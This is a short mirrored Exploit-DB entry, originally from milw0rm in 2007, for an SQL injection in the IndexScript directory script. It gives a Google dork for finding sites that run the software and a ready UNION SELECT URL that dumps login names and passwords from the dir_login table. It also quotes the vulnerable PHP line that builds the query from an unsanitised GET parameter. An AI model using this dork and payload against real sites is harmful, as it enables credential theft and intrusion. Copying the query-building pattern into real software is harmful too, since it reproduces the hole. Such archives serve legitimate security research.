exploit-db-mirror/exploits/php/webapps/4225.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

16 lines
No EOL
429 B
Text

Site: http://indexscript.com
Found By: xssvgamer
Google Dork: allintext: "This site is powered by IndexScript"
exploit:
http://www.example.com/show_cat.php?cat_id=-1 UNION ALL SELECT login,password FROM dir_login /*
Blind SQL injection in indexscript..
Vul Code:
"$sql = "select name, meta_title, meta_description, meta_keywords from dir_cat where " .
"cat_id=" . fnpreparesql($_GET['cat_id']);"
# milw0rm.com [2007-07-25]